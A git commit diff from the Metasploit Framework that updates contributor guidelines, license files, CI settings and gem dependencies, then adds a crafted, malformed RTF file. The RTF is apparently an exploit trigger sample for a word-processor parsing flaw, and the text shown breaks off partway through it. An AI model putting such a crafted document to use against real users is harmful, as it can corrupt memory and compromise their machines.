merge fix
commit
5c3289bbc6
|
@ -1,11 +1,15 @@
|
||||||
language: ruby
|
language: ruby
|
||||||
env: MSF_SPOTCHECK_RECENT=1
|
|
||||||
before_install:
|
before_install:
|
||||||
- rake --version
|
- rake --version
|
||||||
- sudo apt-get update -qq
|
- sudo apt-get update -qq
|
||||||
- sudo apt-get install -qq libpcap-dev
|
- sudo apt-get install -qq libpcap-dev
|
||||||
|
# Uncomment when we have fewer shipping msftidy warnings.
|
||||||
|
# Merge committers will still be checking, just not autofailing.
|
||||||
|
# See https://dev.metasploit.com/redmine/issues/8498
|
||||||
|
# - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
|
||||||
|
# - ls -la ./.git/hooks
|
||||||
|
# - ./.git/hooks/post-merge
|
||||||
before_script:
|
before_script:
|
||||||
- ./tools/msftidy.rb
|
|
||||||
- cp config/database.yml.travis config/database.yml
|
- cp config/database.yml.travis config/database.yml
|
||||||
- bundle exec rake --version
|
- bundle exec rake --version
|
||||||
- bundle exec rake db:create
|
- bundle exec rake db:create
|
||||||
|
|
|
@ -1,44 +1,70 @@
|
||||||
# Contributing to Metasploit
|
# Contributing to Metasploit
|
||||||
|
|
||||||
## Reporting Bugs
|
Thanks for your interest in making Metasploit -- and therefore, the
|
||||||
|
world -- a better place! What you see here in CONTRIBUTING.md is a
|
||||||
|
bullet-point list of the do's and don'ts of how to make sure *your*
|
||||||
|
valuable contributions actually make it into Metasploit's master branch.
|
||||||
|
|
||||||
If you would like to report a bug, please take a look at [our Redmine
|
If you care not to follow these rules, your contribution **will** be
|
||||||
issue
|
closed (*Road House* style). Sorry!
|
||||||
tracker](https://dev.metasploit.com/redmine/projects/framework/issues?query_id=420)
|
|
||||||
-- your bug may already have been reported there! Simply [searching](https://dev.metasploit.com/redmine/projects/framework/search) for some appropriate keywords may save everyone a lot of hassle.
|
|
||||||
|
|
||||||
If your bug is new and you'd like to report it you will need to
|
Incidentally, this is a **short** list. The
|
||||||
[register
|
[wiki](https://github.com/rapid7/metasploit-framework/wiki) is much more
|
||||||
first](https://dev.metasploit.com/redmine/account/register). Don't
|
exhaustive and reveals many mysteries. If you read nothing else, take a
|
||||||
worry, it's easy and fun and takes about 30 seconds.
|
look at the standard [development environment setup
|
||||||
|
guide](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment)
|
||||||
|
and Metasploit's [Common Coding Mistakes](https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes).
|
||||||
|
|
||||||
When you file a bug report, please include your **steps to reproduce**,
|
## Code Contributions
|
||||||
full copy-pastes of Ruby stack traces, and any relevant details about
|
|
||||||
your environment. Without repro steps, your bug will likely be closed.
|
|
||||||
With repro steps, your bugs will likely be fixed.
|
|
||||||
|
|
||||||
## Contributing Metasploit Modules
|
* **Do** stick to the [Ruby style guide](https://github.com/bbatsov/ruby-style-guide).
|
||||||
|
* **Do** follow the [50/72 rule](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) for Git commit messages.
|
||||||
|
* **Do** create a [topic branch](http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches) to work on instead of working directly on `master`.
|
||||||
|
|
||||||
If you have an exploit that you'd like to contribute to the Metasploit
|
### Pull Requests
|
||||||
Framework, please familiarize yourself with the
|
|
||||||
**[HACKING](https://github.com/rapid7/metasploit-framework/blob/master/HACKING)**
|
|
||||||
document in the
|
|
||||||
Metasploit-Framework repository. There are many mysteries revealed in
|
|
||||||
HACKING concerning code style and content.
|
|
||||||
|
|
||||||
[Pull requests](https://github.com/rapid7/metasploit-framework/pulls)
|
* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
|
||||||
should corellate with modules at a 1:1 ratio
|
* **Do** specify a descriptive title to make searching for your pull request easier.
|
||||||
-- there is rarely a good reason to have two, three, or ten modules on
|
* **Do** include [console output](https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks), especially for witnessable effects in `msfconsole`.
|
||||||
one pull request, as this dramatically increases the review time
|
* **Do** list [verification steps](https://help.github.com/articles/writing-on-github#task-lists) so your code is testable.
|
||||||
required to land (commit) any of those modules.
|
* **Don't** leave your pull request description blank.
|
||||||
|
* **Don't** abandon your pull request. Being responsive helps us land your code faster.
|
||||||
|
|
||||||
Pull requests tend to be very collaborative for Metasploit -- do not be
|
Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940) and [#3043](https://github.com/rapid7/metasploit-framework/pull/3043) are a couple good examples to follow.
|
||||||
surprised if your pull request to rapid7/metasploit-framework triggers a
|
|
||||||
pull request back to your own fork. In this way, we can isolate working
|
|
||||||
changes before landing your PR to the Metasploit master branch.
|
|
||||||
|
|
||||||
To save yourself the embarrassment of committing common errors, you will
|
#### New Modules
|
||||||
want to symlink the `msftidy.rb` utility to your pre-commit hooks by
|
|
||||||
running `ln -s ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit`
|
* **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
|
||||||
from the top-level directory of your metasploit-framework clone. This
|
* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much.
|
||||||
will prevent you from committing modules that raise WARNINGS or ERRORS.
|
* **Don't** include more than one module per pull request.
|
||||||
|
|
||||||
|
#### Library Code
|
||||||
|
|
||||||
|
* **Do** write [RSpec](http://rspec.info/) tests - even the smallest change in library land can thoroughly screw things up.
|
||||||
|
* **Do** follow [Better Specs](http://betterspecs.org/) - it's like the style guide for specs.
|
||||||
|
* **Do** write [YARD](http://yardoc.org/) documentation - this makes it easier for people to use your code.
|
||||||
|
* **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
|
||||||
|
|
||||||
|
#### Bug Fixes
|
||||||
|
|
||||||
|
* **Do** include reproduction steps in the form of verification steps.
|
||||||
|
* **Do** include a link to the corresponding [Redmine](https://dev.metasploit.com/redmine/projects/framework) issue in the format of `SeeRM #1234` in your commit description.
|
||||||
|
|
||||||
|
## Bug Reports
|
||||||
|
|
||||||
|
* **Do** report vulnerabilities in Rapid7 software to security@rapid7.com.
|
||||||
|
* **Do** create a Redmine account and report your bug there.
|
||||||
|
* **Do** write a detailed description of your bug and use a descriptive title.
|
||||||
|
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
|
||||||
|
* **Don't** file duplicate reports - search for your bug before filing a new report.
|
||||||
|
* **Don't** report a bug on GitHub. Use [Redmine](https://dev.metasploit.com/redmine/projects/framework) instead.
|
||||||
|
|
||||||
|
Redmine issues [#8762](https://dev.metasploit.com/redmine/issues/8762) and [#8764](https://dev.metasploit.com/redmine/issues/8764) are a couple good examples to follow.
|
||||||
|
|
||||||
|
If you need some more guidance, talk to the main body of open
|
||||||
|
source contributors over on the [Freenode IRC channel](http://webchat.freenode.net/?channels=%23metasploit&uio=d4)
|
||||||
|
or e-mail us at [metasploit-hackers](https://lists.sourceforge.net/lists/listinfo/metasploit-hackers)
|
||||||
|
mailing list.
|
||||||
|
|
||||||
|
Also, **thank you** for taking the few moments to read this far! You're
|
||||||
|
already way ahead of the curve, so keep it up!
|
||||||
|
|
2
COPYING
2
COPYING
|
@ -1,4 +1,4 @@
|
||||||
Copyright (C) 2006-2013, Rapid7 Inc.
|
Copyright (C) 2006-2013, Rapid7, Inc.
|
||||||
All rights reserved.
|
All rights reserved.
|
||||||
|
|
||||||
Redistribution and use in source and binary forms, with or without modification,
|
Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
|
4
Gemfile
4
Gemfile
|
@ -10,6 +10,8 @@ gem 'json'
|
||||||
gem 'msgpack'
|
gem 'msgpack'
|
||||||
# Needed by anemone crawler
|
# Needed by anemone crawler
|
||||||
gem 'nokogiri'
|
gem 'nokogiri'
|
||||||
|
# Needed by JSObfu
|
||||||
|
gem 'rkelly-remix', '0.0.6'
|
||||||
# Needed by anemone crawler
|
# Needed by anemone crawler
|
||||||
gem 'robots'
|
gem 'robots'
|
||||||
# Needed by db.rb and Msf::Exploit::Capture
|
# Needed by db.rb and Msf::Exploit::Capture
|
||||||
|
@ -19,7 +21,7 @@ group :db do
|
||||||
# Needed for Msf::DbManager
|
# Needed for Msf::DbManager
|
||||||
gem 'activerecord'
|
gem 'activerecord'
|
||||||
# Database models shared between framework and Pro.
|
# Database models shared between framework and Pro.
|
||||||
gem 'metasploit_data_models', '~> 0.16.9'
|
gem 'metasploit_data_models', '~> 0.17.0'
|
||||||
# Needed for module caching in Mdm::ModuleDetails
|
# Needed for module caching in Mdm::ModuleDetails
|
||||||
gem 'pg', '>= 0.11'
|
gem 'pg', '>= 0.11'
|
||||||
end
|
end
|
||||||
|
|
|
@ -22,7 +22,7 @@ GEM
|
||||||
fivemat (1.2.1)
|
fivemat (1.2.1)
|
||||||
i18n (0.6.5)
|
i18n (0.6.5)
|
||||||
json (1.8.0)
|
json (1.8.0)
|
||||||
metasploit_data_models (0.16.9)
|
metasploit_data_models (0.17.0)
|
||||||
activerecord (>= 3.2.13)
|
activerecord (>= 3.2.13)
|
||||||
activesupport
|
activesupport
|
||||||
pg
|
pg
|
||||||
|
@ -37,6 +37,7 @@ GEM
|
||||||
pg (0.16.0)
|
pg (0.16.0)
|
||||||
rake (10.1.0)
|
rake (10.1.0)
|
||||||
redcarpet (3.0.0)
|
redcarpet (3.0.0)
|
||||||
|
rkelly-remix (0.0.6)
|
||||||
robots (0.10.1)
|
robots (0.10.1)
|
||||||
rspec (2.14.1)
|
rspec (2.14.1)
|
||||||
rspec-core (~> 2.14.0)
|
rspec-core (~> 2.14.0)
|
||||||
|
@ -67,7 +68,7 @@ DEPENDENCIES
|
||||||
factory_girl (>= 4.1.0)
|
factory_girl (>= 4.1.0)
|
||||||
fivemat (= 1.2.1)
|
fivemat (= 1.2.1)
|
||||||
json
|
json
|
||||||
metasploit_data_models (~> 0.16.9)
|
metasploit_data_models (~> 0.17.0)
|
||||||
msgpack
|
msgpack
|
||||||
network_interface (~> 0.0.1)
|
network_interface (~> 0.0.1)
|
||||||
nokogiri
|
nokogiri
|
||||||
|
@ -76,6 +77,7 @@ DEPENDENCIES
|
||||||
pg (>= 0.11)
|
pg (>= 0.11)
|
||||||
rake (>= 10.0.0)
|
rake (>= 10.0.0)
|
||||||
redcarpet
|
redcarpet
|
||||||
|
rkelly-remix (= 0.0.6)
|
||||||
robots
|
robots
|
||||||
rspec (>= 2.12)
|
rspec (>= 2.12)
|
||||||
shoulda-matchers
|
shoulda-matchers
|
||||||
|
|
148
HACKING
148
HACKING
|
@ -1,139 +1,33 @@
|
||||||
# $Id$
|
HACKING
|
||||||
|
=======
|
||||||
|
|
||||||
This file contains some brief instructions on contributing to the
|
(Last updated: 2014-03-04)
|
||||||
Metasploit Framework.
|
|
||||||
|
|
||||||
Code Style
|
This document almost entirely deprecated by:
|
||||||
==========
|
|
||||||
|
|
||||||
In order to maintain consistency and readability, we ask that you
|
CONTRIBUTING.md
|
||||||
adhere to the following style guidelines:
|
|
||||||
|
|
||||||
- Standard Ruby two-space soft tabs, not hard tabs.
|
in the same directory as this file, and to a lesser extent:
|
||||||
- Try to keep your lines under 100 columns (assuming two-space tabs)
|
|
||||||
- do; end instead of {} for a block
|
|
||||||
- Always use str[0,1] instead of str[0]
|
|
||||||
(This avoids a known ruby 1.8/1.9 incompatibility.)
|
|
||||||
- Method names should always be lower_case and words separated by "_"
|
|
||||||
- Variable names should be lower case with words separated by "_"
|
|
||||||
- Don't depend on any external gems or libraries without talking to
|
|
||||||
todb to resolve packaging and licensing issues
|
|
||||||
|
|
||||||
You can use the the "./tools/msftidy.rb" script to do some rudimentary
|
|
||||||
checking for various violations.
|
|
||||||
|
|
||||||
|
|
||||||
Code No-Nos
|
|
||||||
===========
|
|
||||||
|
|
||||||
1. Don't print to standard output. Doing so means that users of
|
|
||||||
interfaces other than msfconsole, such as msfrpc and msfgui, won't see
|
|
||||||
your output. You can use print_line to accomplish the same thing as
|
|
||||||
puts.
|
|
||||||
|
|
||||||
2. Don't read from standard input, doing so will make your code
|
|
||||||
lock up the entire module when called from other interfaces. If you
|
|
||||||
need user input, you can either register an option or expose an
|
|
||||||
interactive session type specific for the type of exploit.
|
|
||||||
|
|
||||||
3. Always use Rex sockets, not ruby sockets. This includes
|
|
||||||
third-party libraries such as Net::Http. There are several very good
|
|
||||||
reasons for this rule. First, the framework doesn't get notified on
|
|
||||||
the creation of ruby sockets and won't know how to clean them up in
|
|
||||||
case your module raises an exception without cleaning up after itself.
|
|
||||||
Secondly, non-Rex sockets do not know about routes and therefore can't
|
|
||||||
be used through a meterpreter tunnel. Lastly, regular sockets miss
|
|
||||||
out on msf's proxy and SSL features. Msf includes many protocols
|
|
||||||
already implemented with Rex and if the protocol you need is missing,
|
|
||||||
porting another library to use them is straight-forward. See our
|
|
||||||
Net::SSH modifications in lib/net/ssh/ for an example.
|
|
||||||
|
|
||||||
4. When opening an IO stream, always force binary with "b" mode (or
|
|
||||||
using IO#binmode). This not only helps keep Windows and non-Windows
|
|
||||||
runtime environments consistent with each other, but also guarantees
|
|
||||||
that files will be treated as ASCII-8BIT instead of UTF-8.
|
|
||||||
|
|
||||||
5. Don't use String#[] for a single character. This returns a Fixnum in
|
|
||||||
ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
|
|
||||||
str[idx,1]
|
|
||||||
which always returns a String. If you need the ASCII byte, unpack it like
|
|
||||||
so:
|
|
||||||
tr[idx,1].unpack("C")[0]
|
|
||||||
|
|
||||||
6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
|
|
||||||
The '<<' operator is significantly faster. The difference will become
|
|
||||||
even more apparent when doing string manipulation in a loop. The
|
|
||||||
following table approximates the underlying implementation:
|
|
||||||
|
|
||||||
Ruby Pseudo-C
|
|
||||||
----------- ----------------
|
|
||||||
a = b + c a = malloc(b.len+c.len+1);
|
|
||||||
strcpy(a, b);
|
|
||||||
memcpy(a+b.len, c, c.len);
|
|
||||||
a[b.len + c.len] = '\0';
|
|
||||||
a = b a = b;
|
|
||||||
a << c a = realloc(a, a.len+c.len+1);
|
|
||||||
memcpy(a+a.len, c, c.len);
|
|
||||||
a[a.len + c.len] = '\0';
|
|
||||||
|
|
||||||
Note that the original value of 'b' is lost in the second case. Care
|
|
||||||
must be taken to duplicate strings that you do not want to modify.
|
|
||||||
|
|
||||||
7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
|
|
||||||
excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
|
|
||||||
for an overview of common and not-so-common Ruby version related gotchas.
|
|
||||||
|
|
||||||
8. Never, ever use $global variables. This applies to modules, mixins,
|
|
||||||
and libraries. If you need a "global" within a specific class, you can
|
|
||||||
use @@class_variables, but most modules should use @instance variables
|
|
||||||
to store information between methods.
|
|
||||||
|
|
||||||
9. Don't craft your XML document raw or by using Nokogiri, the current
|
|
||||||
preferred way is REXML.
|
|
||||||
|
|
||||||
Creating New Modules
|
|
||||||
====================
|
|
||||||
|
|
||||||
When creating a new module, the simplest way to start is to copy
|
|
||||||
another module that uses the same protocol and modify it to your
|
|
||||||
needs. If you're creating an exploit module, generally you'll want
|
|
||||||
to edit the exploit() method. Auxiliary Scanner modules use one of
|
|
||||||
run_host(), run_range(), or run_batch() instead of exploit().
|
|
||||||
Non-scanner aux modules use run().
|
|
||||||
|
|
||||||
|
|
||||||
Submitting Your Code
|
|
||||||
====================
|
|
||||||
|
|
||||||
To get started with a Metasploit Framework source clone, simply:
|
|
||||||
|
|
||||||
- Fork rapid7/metasploit-framework to your GitHub account
|
|
||||||
- git clone git://github.com/YourName/metasploit-framework.git
|
|
||||||
- gem install bundler
|
|
||||||
- bundle install
|
|
||||||
|
|
||||||
More detailed documentation regarding the process for submitting new
|
|
||||||
modules via GitHub is documented here:
|
|
||||||
|
|
||||||
|
The Metasploit Development Environment
|
||||||
https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment
|
https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment
|
||||||
|
|
||||||
This describes the process of forking, editing, and generating a
|
Common Coding Mistakes
|
||||||
pull request, and is the preferred method for bringing new modules
|
https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
|
||||||
and framework enhancements to the attention of the core Metasploit
|
|
||||||
development team. Note that this process requires a GitHub account.
|
|
||||||
|
|
||||||
For Git commits, please adhere to 50/72 formatting: your commits should
|
The Ruby Style Guide
|
||||||
start with a line 50 characters or less, followed by a blank line,
|
https://github.com/bbatsov/ruby-style-guide
|
||||||
followed by one or more lines of explanatory text wrapped at at 72
|
|
||||||
characters Pull requests with commits not formatted this way will
|
|
||||||
be rejected without review.
|
|
||||||
|
|
||||||
For modules, note that Author field is not automatic, and should be
|
Ruby 1.9: What to Expect
|
||||||
filled in in the format of 'Your Name <user[at]domain.tld>' so future
|
http://slideshow.rubyforge.org/ruby19.html
|
||||||
developers can contact you with any questions.
|
|
||||||
|
You can use the the "./tools/msftidy.rb" script against your new and
|
||||||
|
changed modules to do some rudimentary checking for various style and
|
||||||
|
syntax violations.
|
||||||
|
|
||||||
|
Licensing for Your New Content
|
||||||
|
==============================
|
||||||
|
|
||||||
Licensing
|
|
||||||
=========
|
|
||||||
By submitting code contributions to the Metasploit Project it is
|
By submitting code contributions to the Metasploit Project it is
|
||||||
assumed that you are offering your code under the Metasploit License
|
assumed that you are offering your code under the Metasploit License
|
||||||
or similar 3-clause BSD-compatible license. MIT and Ruby Licenses
|
or similar 3-clause BSD-compatible license. MIT and Ruby Licenses
|
||||||
|
@ -141,6 +35,4 @@ are also fine. We specifically cannot include GPL code. LGPL code
|
||||||
is accepted on a case by case basis for libraries only and is never
|
is accepted on a case by case basis for libraries only and is never
|
||||||
accepted for modules.
|
accepted for modules.
|
||||||
|
|
||||||
When possible, such as aux and exploit modules, be sure to include
|
|
||||||
your license designation in the file in the appropriate place.
|
|
||||||
|
|
||||||
|
|
21
LICENSE
21
LICENSE
|
@ -2,19 +2,23 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
|
||||||
Source: http://www.metasploit.com/
|
Source: http://www.metasploit.com/
|
||||||
|
|
||||||
Files: *
|
Files: *
|
||||||
Copyright: 2006-2013, Rapid7 Inc.
|
Copyright: 2006-2014, Rapid7, Inc.
|
||||||
License: BSD-3-clause
|
License: BSD-3-clause
|
||||||
|
|
||||||
# The Metasploit Framework is provided under the 3-clause BSD license provided
|
# The Metasploit Framework is provided under the 3-clause BSD license provided
|
||||||
# at the end of this file.
|
# at the end of this file.
|
||||||
#
|
#
|
||||||
# The copyright on this package is held by Rapid7 LLC.
|
# The copyright on this package is held by Rapid7, Inc.
|
||||||
#
|
#
|
||||||
# This license does not apply to third-party components detailed below.
|
# This license does not apply to third-party components detailed below.
|
||||||
#
|
#
|
||||||
# Last updated: 2013-Nov-04
|
# Last updated: 2013-Nov-04
|
||||||
#
|
#
|
||||||
|
|
||||||
|
Files: data/templates/to_mem_pshreflection.ps1.template
|
||||||
|
Copyright: 2012, Matthew Graeber
|
||||||
|
License: BSD-3-clause
|
||||||
|
|
||||||
Files: data/john/*
|
Files: data/john/*
|
||||||
Copyright: 1996-2011 Solar Designer.
|
Copyright: 1996-2011 Solar Designer.
|
||||||
License: GPL-2
|
License: GPL-2
|
||||||
|
@ -80,7 +84,7 @@ Copyright: 2005-2009, Joel VanderWerf
|
||||||
License: Ruby
|
License: Ruby
|
||||||
|
|
||||||
Files: lib/fastlib.rb
|
Files: lib/fastlib.rb
|
||||||
Copyright: 2011, Rapid7 Inc.
|
Copyright: 2011, Rapid7, Inc.
|
||||||
License: Ruby
|
License: Ruby
|
||||||
|
|
||||||
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
|
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
|
||||||
|
@ -147,6 +151,11 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
|
||||||
Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
|
Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
|
||||||
License: BSD-3-clause
|
License: BSD-3-clause
|
||||||
|
|
||||||
|
Files: data/webcam/api.js
|
||||||
|
Copyright: Copyright 2013 Muaz Khan<@muazkh>.
|
||||||
|
License: MIT
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Gems
|
# Gems
|
||||||
#
|
#
|
||||||
|
@ -167,6 +176,10 @@ Files: arel
|
||||||
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
|
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
|
||||||
License: MIT
|
License: MIT
|
||||||
|
|
||||||
|
Files: bcrypt-ruby
|
||||||
|
Copyright: 2007-2011 Coda Hale
|
||||||
|
License: MIT
|
||||||
|
|
||||||
Files: builder
|
Files: builder
|
||||||
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
|
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
|
||||||
License: MIT
|
License: MIT
|
||||||
|
@ -301,7 +314,7 @@ License: BSD-3-clause
|
||||||
this list of conditions and the following disclaimer in the documentation
|
this list of conditions and the following disclaimer in the documentation
|
||||||
and/or other materials provided with the distribution.
|
and/or other materials provided with the distribution.
|
||||||
.
|
.
|
||||||
* Neither the name of Rapid7 LLC nor the names of its contributors
|
* Neither the name of Rapid7, Inc. nor the names of its contributors
|
||||||
may be used to endorse or promote products derived from this software
|
may be used to endorse or promote products derived from this software
|
||||||
without specific prior written permission.
|
without specific prior written permission.
|
||||||
.
|
.
|
||||||
|
|
|
@ -24,10 +24,11 @@ The mailing list archives are available from:
|
||||||
|
|
||||||
Installing
|
Installing
|
||||||
--
|
--
|
||||||
Generally, you should use the installer which contains all dependencies
|
|
||||||
and will get you up and running with a few clicks. See the [Dev
|
Generally, you should use [the free installer](https://www.metasploit.com/download)
|
||||||
Environment Setup][wiki-devenv] if you'd like to deal with dependencies
|
which contains all dependencies and will get you up and running with a
|
||||||
on your own.
|
few clicks. See the [Dev Environment Setup](http://r-7.co/MSF-DEV) if
|
||||||
|
you'd like to deal with dependencies on your own.
|
||||||
|
|
||||||
Using Metasploit
|
Using Metasploit
|
||||||
--
|
--
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/env ruby
|
#!/usr/bin/env ruby
|
||||||
|
|
||||||
# Copyright (C) 2008 Metasploit LLC
|
# Copyright (C) 2008 Rapid7, Inc.
|
||||||
|
|
||||||
#
|
#
|
||||||
# This script extracts the forms from the main page of each
|
# This script extracts the forms from the main page of each
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/env ruby
|
#!/usr/bin/env ruby
|
||||||
|
|
||||||
# Copyright (C) 2008 Metasploit LLC
|
# Copyright (C) 2008 Rapid7, Inc.
|
||||||
|
|
||||||
#
|
#
|
||||||
# This script extracts the forms from the main page of each
|
# This script extracts the forms from the main page of each
|
||||||
|
|
Binary file not shown.
|
@ -0,0 +1 @@
|
||||||
|
Any DjVu file can be used this is just a snazzy Metasploit one
|
|
@ -0,0 +1,183 @@
|
||||||
|
{\rt{{{\{\info{\author ismail - [2010{\n{\info{\author ismail - [2010]}ofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}]}info{\revtim\yr{\creatim\yr2014\{\info{\author ismail - [2010]}mo3\dy8\hr3\min9}2014\m{\revt{\*\company home}im\yr2014\mo3\dy8\hr3\min9}{\info{{\revtim\yr2014\mo3\dy8\hr3\min9}\author ismail - [201{\crea{{\revtim\yr2014\mo3\dy8\hr3\min9}\info{\author ismail - [2010]}tim\yr2014\mo3\dy8\hr3\min9}0]}o3\dy8\hr3\min9}{\aut{\nofcha{\info{\author ismail - [2010]}rsws69}{\operator ismail - [2010]}{{\revtim\yr2014\mo3{\creatim\yr2014\mo3\dy8\hr3\min9}\dy8\hr3\min9}\*
|
||||||
|
sidtbl
|
||||||
|
{\creatim\yr2014\mo3\dy8\hr3\min9}sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}hor ismail - [2010]}\revtim{\info{\author ismail - [20{\info{\author ismail - [2010]}10]}\yr2014\mo3\dy8\hr3\min9}{\revt{\inf{\c{\*\{\nofcharsw{\nofcharsws69}{\op{\c{\*\company home}reatim\yr2014\mo3\dy8{\creatim\yr2014\mo3\dy8\hr3\min9}\hr3\min9}erator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}s69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}company home}reatim\yr2014\mo3\dy8\hr3\min9}o{\author ismail - [201{\nofcharsws69}{\operator is{{\revtim\yr2014\mo3\dy8\hr3\min9}\*\company home}mail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}0]}im\yr2014\m{\info{\author ism{\creatim\yr2014\mo3\dy8\hr3\min9}ai{\revtim\yr2014\mo3\dy8\hr3\min9}l - [2010]}o3\dy8\hr3\min9}{\*\company home}\i{{{\crea{\nofcharsws69}{\operator ismai{\creatim{\nofcharsws69}{\o{\*\company home}{\revtim\yr2014\mo3\dy8\hr3\min9}perator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}\yr2014{\*\company home}\mo3\dy8\hr3\min9}l - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}tim{\nofcharsws{\nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl{\nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}\yr2014\mo3\dy8{\revtim\yr2014\mo3\dy8\hr3\min9}\hr3\min9}\{{\creatim\yr2014\mo3\dy8\hr3\min9}\cr{\creati{\*\company home}m{\*\company home}\yr2{\creatim\yr2014\mo3\dy8\hr3\min9}0{\revtim\yr2014\mo3\dy8\hr3\min9}14\mo3\dy8\hr3\min9}eatim{\*\company home{\creatim\yr2014\mo3\dy8\hr3\min9}}\yr2014\mo3\dy8\hr3\min9{\*\compa{\nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}ny home}}revtim\yr20{\nof{\cr{\creatim\yr2014\mo3\dy8\hr3\min9}eatim\yr2014\mo3\dy8\hr3\min9}charsws69}{\ope{{\creatim\yr2014\mo3\dy8\hr3\min9}\*\company home}rator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}{\revtim\yr2014\mo3\dy8\hr3\min9}14\{\creatim\yr2014\mo3\{\nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}dy8\hr3\min9}mo3\dy8\hr{\info{\auth{\info{\author ismail - {\*\company home}[2010]}or ismail - [2010]}3\min9}{\*\company{\info{\author ismail - [2010]} home}\*\company home}nfo{\*\company home}{\author{\info{\auth{\info{\author ismail - [2010]}or ismail - [2010]} ismail - [2010]}{\r{{\*\company home}\revt{\n{\nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
si{\revtim\yr2014\mo3\dy8\hr3\min9}dt{\info{\author ismail - [2010]}bl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}ofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}im\yr20{{{\r{\nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
